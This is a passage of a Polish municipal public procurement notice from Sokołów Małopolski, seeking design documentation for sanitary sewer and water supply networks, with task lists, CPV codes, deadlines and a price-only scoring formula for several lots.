(pozostawienie studzienek kanalizacji sanitarnej). <br/>1. Opracowanie kompletnej dokumentacji projektowej zgodnie z wymogami obowiązującego prawa:<br/>1.1. Opracowanie Projektu budowlanego i zagospodarowania terenu inwestycji, w tym:<br/>- Opracowanie koncepcji i uzgodnienie jej z Zamawiającym i właścicielami posesji prywatnych.<br/>- Uzyskanie niezbędnych zgód i warunków realizacji inwestycji od operatorów sieci kolidujących oraz od operatora sieci wodociągowej.<br/>- Uzyskanie zgód na wejście w teren.<br/>- Pozyskanie wypisów z MPZP, wypisów z rejestru gruntów lub innych wymaganych dokumentów.<br/>- Przygotowanie materiałów i załączników do kompletnego wniosku o uzyskanie decyzji pozwolenia wodnoprawnego lub zgłoszenia wodnoprawnego (jeżeli będzie wymagane);<br/>- Pozyskanie map do celów projektowych, na koszt Wykonawcy, w zakresie niezbędnym do opracowania dokumentacji budowlanej.<br/>- Opracowanie projektu zagospodarowania i uzgodnienie go w ramach narady ZUDP.<br/>- Uzgodnienia przeciwpożarowe – jeżeli będą wymagane przepisami prawa.<br/>- Ew. uzgodnień w zakresie melioracji.<br/>- Przygotowanie dokumentacji geologicznej, określającej warunki gruntowe oraz wodne realizacji inwestycji (jeżeli będzie wymagana).<br/>- Opracowane kompletnego projektu budowlanego (PZT), wraz z niezbędnymi opisami i załącznikami, zgodnie z wymogami prawa budowlanego, który pozwoli na skuteczne uzyskanie pozwolenia na budowę lub zgłoszenia budowy.<br/>- Przygotowywanie wszelkich wniosków o uzyskanie zgód/decyzji administracyjnych na każdym z etapów prac projektowych oraz przygotowanie wniosków o wydanie decyzji o pozwolenie na budowę lub zgłoszenia robót budowlanych do podpisu przez Zamawiającego tj. Burmistrza Gminy Sokołów Małopolski lub osób upoważnionych przez Burmistrza Gminy Sokołów Małopolski wraz z niezbędną ilością egz. wymaganą przez dany Organ/Urząd/Instytucję wraz z wymaganymi załącznikami w ilości innej wg wymagań Organu, w tym 1 egz. dla Zamawiającego;<br/>- Uzyskanie prawomocnych decyzji administracyjnych lub uzyskanie braku sprzeciwu właściwych Organów na realizację danego zakresu inwestycji.<br/>1.2. Opracowanie Projektu technicznego, na etapie przed uzyskaniem pozwolenia na budowę, w tym:<br/>- Opracowanie wszelkich niezbędnych dodatkowych projektów, w tym narzuconych przez użytkowników i administratorów infrastruktury nadziemnej i podziemnej np. projekt zabezpieczenia czy przebudowy istniejącego uzbrojenia, doprowadzenia wymaganych sieci/budowa przyłączy do obiektów liniowych, przejścia przez drogę, lokalizacji infrastruktury w pasie drogowym itp.:<br/>• Dokonanie niezbędnych uzgodnień i uwzględnienie ich przy projektowaniu i ewentualnym zabezpieczeniu lub przeprojektowaniu urządzeń podziemnych,<br/>• Uzyskanie wszystkich opinii i uzgodnień wymaganych obowiązującymi przepisami;<br/>• Opracowanie projektu odtworzenia nawierzchni (jeżeli dotyczy);<br/>• Opracowanie STWiOR;<br/>• Opracowanie przedmiaru robót;<br/>• Opracowanie kosztorysu inwestorskiego;<br/>• Sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;<br/>1.3. Projekty winny być zaopatrzone w wykaz opracowań oraz w pisemne oświadczenie Wykonawcy, że został sporządzony zgodnie z postanowieniami umowy, powszechnie obowiązującymi w tym zakresie przepisami prawa oraz, że jest w stanie kompletnym z punktu widzenia celu, jakiemu ma służyć i nadaje się do realizacji. Wykaz opracowań oraz pisemne oświadczenie, o których mowa wyżej stanowią integralną część Projektu oraz część przedmiotu odbioru końcowego zadania. Projekt nie może zawierać niczego, co naruszałoby jakiekolwiek prawa osób trzecich w tym prawa na dobrach niematerialnych osób trzecich.<br/>1.4. Dokumenty o których mowa w pkt. 1.2 i 1.3 winny być przygotowane w wersji papierowej w 4 egz., oraz w wersji elektronicznej w 1 egz., na nośniku pendrive, dostępne w plikach pdf . Wymaga się aby projekt budowlany w wersji elektronicznej obejmował wersję ostateczną zatwierdzoną przez Starostwo (z pieczęciami Starostwa)<br/>1.5. STWiOR, przedmiary robót oraz kosztorysy inwestorskie winny być przygotowane w wersji papierowej w 2 egz. oraz w wersji elektronicznej w 1 egz., na nośniku pendrive, wymaga się, aby kosztorys inwestorski i przedmiar robót były przygotowane w pliku programu kosztorysowego oraz w wersjach pdf i excel. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322200-3 - Usługi projektowania rurociągów</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">77 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryterium oceny ofert:<br/>Cena - 100% = 100 pkt<br/>Kryterium – cena (C): oferty będą oceniane według poniższego wzoru:<br/>C=(Najniższa całkowita wartość brutto spośród oferty)/(Całkowita wartość brutto badanej oferty) x 100 x 100 %= ...pkt<br/>Najkorzystniejsza oferta w kryterium cena, wg wzoru może uzyskać maksymalnie 100 punktów. Przyznane ilości punktów zostaną zaokrąglone do 2 miejsc po przecinku.<br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą liczę punktów.<br/>Maksymalna łączna liczba punktów jaką możne uzyskać Wykonawca wynosi – 100 pkt.<br/>Zamawiający stosuje zaokrąglenie wyników do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach Zadania nr 3 należy zaprojektować uzbrojenie w sieć kanalizacji sanitarnej działek nr ewid. 1450/1, 1450/2, 1450/3, 1450/4, 1450/5, 1450/6 w Trzebusce, uwzględniając warunki terenowe. Wpięcie do istniejącej sieci kanalizacji sanitarnej na działce nr ewid. 1450/1 lub na działce nr ewid. 1444 w Trzebusce.<br/>1. Opracowanie kompletnej dokumentacji projektowej zgodnie z wymogami obowiązującego prawa:<br/>1.1. Opracowanie Projektu budowlanego i zagospodarowania terenu inwestycji, w tym:<br/>- Opracowanie koncepcji i uzgodnienie jej z Zamawiającym i właścicielami posesji prywatnych.<br/>- Uzyskanie niezbędnych zgód i warunków realizacji inwestycji od operatorów sieci kolidujących oraz od operatora sieci<br/>wodociągowej.<br/>- Uzyskanie zgód na wejście w teren.<br/>- Pozyskanie wypisów z MPZP, wypisów z rejestru gruntów lub innych wymaganych dokumentów.<br/>- Przygotowanie materiałów i załączników do kompletnego wniosku o uzyskanie decyzji pozwolenia wodnoprawnego lub<br/>zgłoszenia wodnoprawnego (jeżeli będzie wymagane);<br/>- Pozyskanie map do celów projektowych, na koszt Wykonawcy, w zakresie niezbędnym do opracowania dokumentacji<br/>budowlanej.<br/>- Opracowanie projektu zagospodarowania i uzgodnienie go w ramach narady ZUDP.<br/>- Uzgodnienia przeciwpożarowe – jeżeli będą wymagane przepisami prawa.<br/>- Ew. uzgodnień w zakresie melioracji.<br/>- Przygotowanie dokumentacji geologicznej, określającej warunki gruntowe oraz wodne realizacji inwestycji (jeżeli będzie<br/>wymagana).<br/>- Opracowane kompletnego projektu budowlanego (PZT), wraz z niezbędnymi opisami i załącznikami, zgodnie z wymogami<br/>prawa budowlanego, który pozwoli na skuteczne uzyskanie pozwolenia na budowę lub zgłoszenia budowy.<br/>- Przygotowywanie wszelkich wniosków o uzyskanie zgód/decyzji administracyjnych na każdym z etapów prac projektowych<br/>oraz przygotowanie wniosków o wydanie decyzji o pozwolenie na budowę lub zgłoszenia robót budowlanych do podpisu<br/>przez Zamawiającego tj. Burmistrza Gminy Sokołów Małopolski lub osób upoważnionych przez Burmistrza Gminy Sokołów<br/>Małopolski wraz z niezbędną ilością egz. wymaganą przez dany Organ/Urząd/Instytucję wraz z wymaganymi załącznikami<br/>w ilości innej wg wymagań Organu, w tym 1 egz. dla Zamawiającego;<br/>- Uzyskanie prawomocnych decyzji administracyjnych lub uzyskanie braku sprzeciwu właściwych Organów na realizację<br/>danego zakresu inwestycji.<br/>1.2. Opracowanie Projektu technicznego, na etapie przed uzyskaniem pozwolenia na budowę, w tym:<br/>- Opracowanie wszelkich niezbędnych dodatkowych projektów, w tym narzuconych przez użytkowników i administratorów<br/>infrastruktury nadziemnej i podziemnej np. projekt zabezpieczenia czy przebudowy istniejącego uzbrojenia, doprowadzenia<br/>wymaganych sieci/budowa przyłączy do obiektów liniowych, przejścia przez drogę, lokalizacji infrastruktury w pasie<br/>drogowym itp.:<br/>• Dokonanie niezbędnych uzgodnień i uwzględnienie ich przy projektowaniu i ewentualnym zabezpieczeniu lub<br/>przeprojektowaniu urządzeń podziemnych,<br/>• Uzyskanie wszystkich opinii i uzgodnień wymaganych obowiązującymi przepisami;<br/>• Opracowanie projektu odtworzenia nawierzchni (jeżeli dotyczy);<br/>• Opracowanie STWiOR;<br/>• Opracowanie przedmiaru robót;<br/>• Opracowanie kosztorysu inwestorskiego;<br/>• Sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;<br/>1.3. Projekty winny być zaopatrzone w wykaz opracowań oraz w pisemne oświadczenie Wykonawcy, że został sporządzony<br/>zgodnie z postanowieniami umowy, powszechnie obowiązującymi w tym zakresie przepisami prawa oraz, że jest w stanie<br/>kompletnym z punktu widzenia celu, jakiemu ma służyć i nadaje się do realizacji. Wykaz opracowań oraz pisemne<br/>oświadczenie, o których mowa wyżej stanowią integralną część Projektu oraz część przedmiotu odbioru końcowego<br/>zadania. Projekt nie może zawierać niczego, co naruszałoby jakiekolwiek prawa osób trzecich w tym prawa na dobrach<br/>niematerialnych osób trzecich.<br/>1.4. Dokumenty o których mowa w pkt. 1.2 i 1.3 winny być przygotowane w wersji papierowej w 4 egz., oraz w wersji<br/>elektronicznej w 1 egz., na nośniku pendrive, dostępne w plikach pdf . Wymaga się aby projekt budowlany w wersji<br/>elektronicznej obejmował wersję ostateczną zatwierdzoną przez Starostwo (z pieczęciami Starostwa)<br/>1.5. STWiOR, przedmiary robót oraz kosztorysy inwestorskie winny być przygotowane w wersji papierowej w 2 egz. oraz w<br/>wersji elektronicznej w 1 egz., na nośniku pendrive, wymaga się, aby kosztorys inwestorski i przedmiar robót były<br/>przygotowane w pliku programu kosztorysowego oraz w wersjach pdf i excel. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322200-3 - Usługi projektowania rurociągów</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">105 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryterium oceny ofert:<br/>Cena - 100% = 100 pkt<br/>Kryterium – cena (C): oferty będą oceniane według poniższego wzoru:<br/>C=(Najniższa całkowita wartość brutto spośród oferty)/(Całkowita wartość brutto badanej oferty) x 100 x 100 %= ...pkt<br/>Najkorzystniejsza oferta w kryterium cena, wg wzoru może uzyskać maksymalnie 100 punktów. Przyznane ilości punktów zostaną zaokrąglone do 2 miejsc po przecinku.<br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą liczę punktów.<br/>Maksymalna łączna liczba punktów jaką możne uzyskać Wykonawca wynosi – 100 pkt.<br/>Zamawiający stosuje zaokrąglenie wyników do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach Zadania nr 4 należy zaprojektować sieć kanalizacji sanitarnej grawitacyjnej w rejonie ul. Głogowskiej w Sokołowie Małopolskim zgodnie z wymogami decyzji środowiskowej nr RG.6220.9.2023 z dnia 25 marca 2024 r. – załącznik nr 3.4.1. do SWZ oraz koncepcją – załącznik nr 3.4.2. do SWZ. <br/>1. Opracowanie kompletnej dokumentacji projektowej zgodnie z wymogami obowiązującego prawa:<br/>1.1. Opracowanie Projektu budowlanego i zagospodarowania terenu inwestycji, w tym:<br/>- Opracowanie koncepcji i uzgodnienie jej z Zamawiającym i właścicielami posesji prywatnych.<br/>- Uzyskanie niezbędnych zgód i warunków realizacji inwestycji od operatorów sieci kolidujących oraz od operatora sieci<br/>wodociągowej.<br/>- Uzyskanie zgód na wejście w teren.<br/>- Pozyskanie wypisów z MPZP, wypisów z rejestru gruntów lub innych wymaganych dokumentów.<br/>- Przygotowanie materiałów i załączników do kompletnego wniosku o uzyskanie decyzji pozwolenia wodnoprawnego lub<br/>zgłoszenia wodnoprawnego (jeżeli będzie wymagane);<br/>- Pozyskanie map do celów projektowych, na koszt Wykonawcy, w zakresie niezbędnym do opracowania dokumentacji<br/>budowlanej.<br/>- Opracowanie projektu zagospodarowania i uzgodnienie go w ramach narady ZUDP.<br/>- Uzgodnienia przeciwpożarowe – jeżeli będą wymagane przepisami prawa.<br/>- Ew. uzgodnień w zakresie melioracji.<br/>- Przygotowanie dokumentacji geologicznej, określającej warunki gruntowe oraz wodne realizacji inwestycji (jeżeli będzie<br/>wymagana).<br/>- Opracowane kompletnego projektu budowlanego (PZT), wraz z niezbędnymi opisami i załącznikami, zgodnie z wymogami<br/>prawa budowlanego, który pozwoli na skuteczne uzyskanie pozwolenia na budowę lub zgłoszenia budowy.<br/>- Przygotowywanie wszelkich wniosków o uzyskanie zgód/decyzji administracyjnych na każdym z etapów prac projektowych<br/>oraz przygotowanie wniosków o wydanie decyzji o pozwolenie na budowę lub zgłoszenia robót budowlanych do podpisu<br/>przez Zamawiającego tj. Burmistrza Gminy Sokołów Małopolski lub osób upoważnionych przez Burmistrza Gminy Sokołów<br/>Małopolski wraz z niezbędną ilością egz. wymaganą przez dany Organ/Urząd/Instytucję wraz z wymaganymi załącznikami<br/>w ilości innej wg wymagań Organu, w tym 1 egz. dla Zamawiającego;<br/>- Uzyskanie prawomocnych decyzji administracyjnych lub uzyskanie braku sprzeciwu właściwych Organów na realizację<br/>danego zakresu inwestycji.<br/>1.2. Opracowanie Projektu technicznego, na etapie przed uzyskaniem pozwolenia na budowę, w tym:<br/>- Opracowanie wszelkich niezbędnych dodatkowych projektów, w tym narzuconych przez użytkowników i administratorów<br/>infrastruktury nadziemnej i podziemnej np. projekt zabezpieczenia czy przebudowy istniejącego uzbrojenia, doprowadzenia<br/>wymaganych sieci/budowa przyłączy do obiektów liniowych, przejścia przez drogę, lokalizacji infrastruktury w pasie<br/>drogowym itp.:<br/>• Dokonanie niezbędnych uzgodnień i uwzględnienie ich przy projektowaniu i ewentualnym zabezpieczeniu lub<br/>przeprojektowaniu urządzeń podziemnych,<br/>• Uzyskanie wszystkich opinii i uzgodnień wymaganych obowiązującymi przepisami;<br/>• Opracowanie projektu odtworzenia nawierzchni (jeżeli dotyczy);<br/>• Opracowanie STWiOR;<br/>• Opracowanie przedmiaru robót;<br/>• Opracowanie kosztorysu inwestorskiego;<br/>• Sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;<br/>1.3. Projekty winny być zaopatrzone w wykaz opracowań oraz w pisemne oświadczenie Wykonawcy, że został sporządzony<br/>zgodnie z postanowieniami umowy, powszechnie obowiązującymi w tym zakresie przepisami prawa oraz, że jest w stanie<br/>kompletnym z punktu widzenia celu, jakiemu ma służyć i nadaje się do realizacji. Wykaz opracowań oraz pisemne<br/>oświadczenie, o których mowa wyżej stanowią integralną część Projektu oraz część przedmiotu odbioru końcowego<br/>zadania. Projekt nie może zawierać niczego, co naruszałoby jakiekolwiek prawa osób trzecich w tym prawa na dobrach<br/>niematerialnych osób trzecich.<br/>1.4. Dokumenty o których mowa w pkt. 1.2 i 1.3 winny być przygotowane w wersji papierowej w 4 egz., oraz w wersji<br/>elektronicznej w 1 egz., na nośniku pendrive, dostępne w plikach pdf . Wymaga się aby projekt budowlany w wersji<br/>elektronicznej obejmował wersję ostateczną zatwierdzoną przez Starostwo (z pieczęciami Starostwa)<br/>1.5. STWiOR, przedmiary robót oraz kosztorysy inwestorskie winny być przygotowane w wersji papierowej w 2 egz. oraz w<br/>wersji elektronicznej w 1 egz., na nośniku pendrive, wymaga się, aby kosztorys inwestorski i przedmiar robót były<br/>przygotowane w pliku programu kosztorysowego oraz w wersjach pdf i excel. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322200-3 - Usługi projektowania rurociągów</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">105 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryterium oceny ofert:<br/>Cena - 100% = 100 pkt<br/>Kryterium – cena (C): oferty będą oceniane według poniższego wzoru:<br/>C=(Najniższa całkowita wartość brutto spośród oferty)/(Całkowita wartość brutto badanej oferty) x 100 x 100 %= ...pkt<br/>Najkorzystniejsza oferta w kryterium cena, wg wzoru może uzyskać maksymalnie 100 punktów. Przyznane ilości punktów zostaną zaokrąglone do 2 miejsc po przecinku.<br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą liczę punktów.<br/>Maksymalna łączna liczba punktów jaką możne uzyskać Wykonawca wynosi – 100 pkt.<br/>Zamawiający stosuje zaokrąglenie wyników do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 5.1. Opracowanie dokumentacji projektowej sieci wodociągowej na osiedlu Słoneczne II<br/>W ramach Zadania nr 5.1. należy zaprojektować sieć wodociągową na osiedlu Słonecznym II w Sokołowie Małopolskim. Projekt powinien przewidzieć uzbrojenie wszystkich działek nieuzbrojonych, które są nie objęte innymi projektami technicznymi. Proponowany przebieg sieci został przedstawiony na mapie – załącznik nr 2.5.1. do SWZ.<br/><br/>Zadanie 5.2. Opracowanie dokumentacji projektowej sieci wodociągowej na osiedlu Piaski III i Piaski IV<br/>W ramach Zadania nr 5.2. należy zaprojektować sieć wodociągową na osiedlu Piaski III i Piaski IV w Sokołowie Małopolskim projekt powinien przewidzieć uzbrojenie wszystkich działek nieuzbrojonych. Proponowany przebieg sieci został przedstawiony na mapie – załącznik nr 2.5.2. do SWZ.<br/><br/>Zadanie 5.3. Opracowanie dokumentacji projektowej sieci kanalizacji sanitarnej grawitacyjnej i tłocznej wraz z przepompownią ścieków na osiedlu Słonecznym II,<br/>W ramach Zadania nr 5.3. należy zaprojektować sieć kanalizacji sanitarnej grawitacyjnej wraz z przepompownią ścieków i rurociągiem tłocznym na osiedlu Słonecznym II w Sokołowie Małopolskim zgodnie z Kartą Informacyjną Przedsięwzięcia oraz wymogami decyzji środowiskowej. Proponowany przebieg sieci został przedstawiony na na mapie – załącznik nr 2.5.3. do SWZ.<br/><br/>Zadanie 5.4. Opracowanie dokumentacji projektowej sieci kanalizacji sanitarnej grawitacyjnej na osiedlach Piaski III i Piaski IV<br/>W ramach Zadania nr 5.4. należy zaprojektować sieć kanalizacji sanitarnej grawitacyjnej na osiedlach Piaski III i Piaski IV w Sokołowie Małopolskim zgodnie z Kartą Informacyjną Przedsięwzięcia oraz wymogami decyzji środowiskowej. Proponowany przebieg sieci został przedstawiony na mapie – załącznik nr 2.5.4. do SWZ.<br/><br/>Projekt sieci kanalizacyjnej z zadań 5.3. i 5.4. powinien być zgodny z wymogami decyzji środowiskowej nr RG.6220.5.2022 z dnia 07.10.2022 r. – załącznik nr 3.5.1. do SWZ oraz koncepcją – załączniki nr. 3.5.2.1., 3.5.2.2., 3.5.2.3. do SWZ.<br/><br/>1. Opracowanie kompletnej dokumentacji projektowej zgodnie z wymogami obowiązującego prawa:<br/>1.1. Opracowanie Projektu budowlanego i zagospodarowania terenu inwestycji, w tym:<br/>- Opracowanie koncepcji i uzgodnienie jej z Zamawiającym i właścicielami posesji prywatnych.<br/>- Uzyskanie niezbędnych zgód i warunków realizacji inwestycji od operatorów sieci kolidujących oraz od operatora sieci<br/>wodociągowej.<br/>- Uzyskanie zgód na wejście w teren.<br/>- Pozyskanie wypisów z MPZP, wypisów z rejestru gruntów lub innych wymaganych dokumentów.<br/>- Przygotowanie materiałów i załączników do kompletnego wniosku o uzyskanie decyzji pozwolenia wodnoprawnego lub<br/>zgłoszenia wodnoprawnego (jeżeli będzie wymagane);<br/>- Pozyskanie map do celów projektowych, na koszt Wykonawcy, w zakresie niezbędnym do opracowania dokumentacji<br/>budowlanej.<br/>- Opracowanie projektu zagospodarowania i uzgodnienie go w ramach narady ZUDP.<br/>- Uzgodnienia przeciwpożarowe – jeżeli będą wymagane przepisami prawa.<br/>- Ew. uzgodnień w zakresie melioracji.<br/>- Przygotowanie dokumentacji geologicznej, określającej warunki gruntowe oraz wodne realizacji inwestycji (jeżeli będzie<br/>wymagana).<br/>- Opracowane kompletnego projektu budowlanego (PZT), wraz z niezbędnymi opisami i załącznikami, zgodnie z wymogami<br/>prawa budowlanego, który pozwoli na skuteczne uzyskanie pozwolenia na budowę lub zgłoszenia budowy.<br/>- Przygotowywanie wszelkich wniosków o uzyskanie zgód/decyzji administracyjnych na każdym z etapów prac projektowych<br/>oraz przygotowanie wniosków o wydanie decyzji o pozwolenie na budowę lub zgłoszenia robót budowlanych do podpisu<br/>przez Zamawiającego tj. Burmistrza Gminy Sokołów Małopolski lub osób upoważnionych przez Burmistrza Gminy Sokołów<br/>Małopolski wraz z niezbędną ilością egz. wymaganą przez dany Organ/Urząd/Instytucję wraz z wymaganymi załącznikami<br/>w ilości innej wg wymagań Organu, w tym 1 egz. dla Zamawiającego;<br/>- Uzyskanie prawomocnych decyzji administracyjnych lub uzyskanie braku sprzeciwu właściwych Organów na realizację<br/>danego zakresu inwestycji.<br/>1.2. Opracowanie Projektu technicznego, na etapie przed uzyskaniem pozwolenia na budowę, w tym:<br/>- Opracowanie wszelkich niezbędnych dodatkowych projektów, w tym narzuconych przez użytkowników i administratorów<br/>infrastruktury nadziemnej i podziemnej np. projekt zabezpieczenia czy przebudowy istniejącego uzbrojenia, doprowadzenia<br/>wymaganych sieci/budowa przyłączy do obiektów liniowych, przejścia przez drogę, lokalizacji infrastruktury w pasie<br/>drogowym itp.:<br/>• Dokonanie niezbędnych uzgodnień i uwzględnienie ich przy projektowaniu i ewentualnym zabezpieczeniu lub<br/>przeprojektowaniu urządzeń podziemnych,<br/>• Uzyskanie wszystkich opinii i uzgodnień wymaganych obowiązującymi przepisami;<br/>• Opracowanie projektu odtworzenia nawierzchni (jeżeli dotyczy);<br/>• Opracowanie STWiOR;<br/>• Opracowanie przedmiaru robót;<br/>• Opracowanie kosztorysu inwestorskiego;<br/>• Sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;<br/>1.3. Projekty winny być zaopatrzone w wykaz opracowań oraz w pisemne oświadczenie Wykonawcy, że został sporządzony<br/>zgodnie z postanowieniami umowy, powszechnie obowiązującymi w tym zakresie przepisami prawa oraz, że jest w stanie<br/>kompletnym z punktu widzenia celu, jakiemu ma służyć i nadaje się do realizacji. Wykaz opracowań oraz pisemne<br/>oświadczenie, o których mowa wyżej stanowią integralną część Projektu oraz część przedmiotu odbioru końcowego<br/>zadania. Projekt nie może zawierać niczego, co naruszałoby jakiekolwiek prawa osób trzecich w tym prawa na dobrach<br/>niematerialnych osób trzecich.<br/>1.4. Dokumenty o których mowa w pkt. 1.2 i 1.3 winny być przygotowane w wersji papierowej w 4 egz., oraz w wersji<br/>elektronicznej w 1 egz., na nośniku pendrive, dostępne w plikach pdf . Wymaga się aby projekt budowlany w wersji<br/>elektronicznej obejmował wersję ostateczną zatwierdzoną przez Starostwo (z pieczęciami Starostwa)<br/>1.5. STWiOR, przedmiary robót oraz kosztorysy inwestorskie winny być przygotowane w wersji papierowej w 2 egz. oraz w<br/>wersji elektronicznej w 1 egz., na nośniku pendrive, wymaga się, aby kosztorys inwestorski i przedmiar robót były<br/>przygotowane w pliku programu kosztorysowego oraz w wersjach pdf i excel. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322200-3 - Usługi projektowania rurociągów</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">705 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryterium oceny ofert:<br/>Cena - 100% = 100 pkt<br/>Kryterium – cena (C): oferty będą oceniane według poniższego wzoru:<br/>C=(Najniższa całkowita wartość brutto spośród oferty)/(Całkowita wartość brutto badanej oferty) x 100 x 100 %= ...pkt<br/>Najkorzystniejsza oferta w kryterium cena, wg wzoru może uzyskać maksymalnie 100 punktów. Przyznane ilości punktów zostaną zaokrąglone do 2 miejsc po przecinku.<br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą liczę punktów.<br/>Maksymalna łączna liczba punktów jaką możne uzyskać Wykonawca wynosi – 100 pkt.<br/>Zamawiający stosuje zaokrąglenie wyników do dwóch miejsc po przecinku.</span></h3> <h3 